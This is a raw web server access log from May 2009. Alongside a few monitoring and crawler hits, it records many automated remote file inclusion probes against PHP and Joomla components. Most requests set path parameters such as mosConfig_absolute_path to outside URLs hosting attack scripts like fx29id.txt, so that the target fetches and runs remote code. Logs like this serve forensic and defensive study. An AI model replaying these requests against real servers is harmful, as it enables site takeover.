69.50.197.106 - - [29/May/2009:03:49:36 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:03:50:13 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:03:50:13 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:03:50:14 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.94.155.59 - - [29/May/2009:03:51:54 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
203.94.155.59 - - [29/May/2009:03:51:54 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.94.155.59 - - [29/May/2009:03:51:54 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:03:52:13 -0400] "GET /logs/error_log.Q108100300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:03:52:38 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:03:53:05 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.208.111.178 - - [29/May/2009:03:53:05 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.18.148.82 - - [29/May/2009:03:53:18 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:53:18 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:53:18 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:53:28 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:03:53:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [29/May/2009:03:53:58 -0400] "GET //index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:53:58 -0400] "GET /logs//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:53:58 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:54:14 -0400] "GET //index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:54:14 -0400] "GET /logs//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:54:14 -0400] "GET /logs/access_log.Q109051600//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:54:19 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:03:54:23 -0400] "GET /logs/access_log.Q109050700//index.php?option=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:03:54:24 -0400] "GET /logs/access_log.Q109050700%20%20//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:55:09 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:55:09 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:55:09 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.237.146.58 - - [29/May/2009:03:55:16 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:55:25 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:55:29 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:55:35 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.241.40.51 - - [29/May/2009:03:55:38 -0400] "GET /impex/ImpExData.php?systempath=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.241.40.51 - - [29/May/2009:03:55:38 -0400] "GET /logs/access_log.Q108081500/impex/ImpExData.php?systempath=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.241.40.51 - - [29/May/2009:03:55:38 -0400] "GET /logs/impex/ImpExData.php?systempath=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
203.94.155.59 - - [29/May/2009:03:56:35 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:57:08 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:57:08 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:57:08 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:03:57:22 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:03:58:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.151.134.36 - - [29/May/2009:03:58:59 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.151.134.36 - - [29/May/2009:03:59:01 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
65.98.80.2 - - [29/May/2009:03:59:04 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:04 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:04 -0400] "GET /logs/error_log.Q108122800%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:09 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:34 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:34 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:34 -0400] "GET /logs/error_log.Q108122800%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:59:42 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:59:42 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:59:42 -0400] "GET /logs/error_log.Q108122800%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:03:59:43 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:59:45 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:59:45 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:59:45 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:03:59:47 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:03:59:49 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:00:16 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:00:16 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:00:17 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:01:00 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:01:00 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:01:00 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:01:37 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:01:42 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.237.146.58 - - [29/May/2009:04:02:17 -0400] "GET /logs/access_log.Q109050700//newspublish/include.php?path%5Bdocroot%5D=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:04:02:53 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:04:02:53 -0400] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:04:02:58 -0400] "GET /logs/error_log.Q109042900%20%20/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:03:07 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:03:07 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:03:23 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:04:03:33 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:04:03:33 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:04:03:33 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.208.111.178 - - [29/May/2009:04:03:37 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:04:03:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:04:03:39 -0400] "GET /port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:03:39 -0400] "GET /logs/port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.181.7.97 - - [29/May/2009:04:03:40 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:04:04:23 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:16 -0400] "GET //mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:16 -0400] "GET /logs//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:16 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:05:17 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:05:25 -0400] "GET //mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:05:25 -0400] "GET /logs//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:05:25 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.150.79.146 - - [29/May/2009:04:05:42 -0400] "GET /logs/access_log.Q109051000////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
218.150.79.146 - - [29/May/2009:04:05:43 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 200 3301 "-" "libwww-perl/5.805"
203.151.233.72 - - [29/May/2009:04:05:44 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:05:44 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:05:44 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:05:51 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:05:51 -0400] "GET /logs/?sourcedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:05:51 -0400] "GET /?sourcedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:55 -0400] "GET /logs//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:55 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:05:55 -0400] "GET //mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:05:56 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:06:02 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [29/May/2009:04:06:38 -0400] "GET /logs/error_log.Q109042900////?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:04:06:46 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:04:06:47 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
216.221.10.116 - - [29/May/2009:04:07:03 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:14 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:14 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:14 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:15 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:15 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:15 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.151.134.36 - - [29/May/2009:04:07:17 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
65.98.80.2 - - [29/May/2009:04:07:18 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.151.134.36 - - [29/May/2009:04:07:19 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bbenglish.net/zb41/sup?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
65.98.80.2 - - [29/May/2009:04:07:26 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:37 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:37 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:04:07:37 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.94.155.59 - - [29/May/2009:04:07:38 -0400] "GET /logs/access_log.Q109050700//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:43 -0400] "GET /logs/access_log.Q109050700%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:51 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:51 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
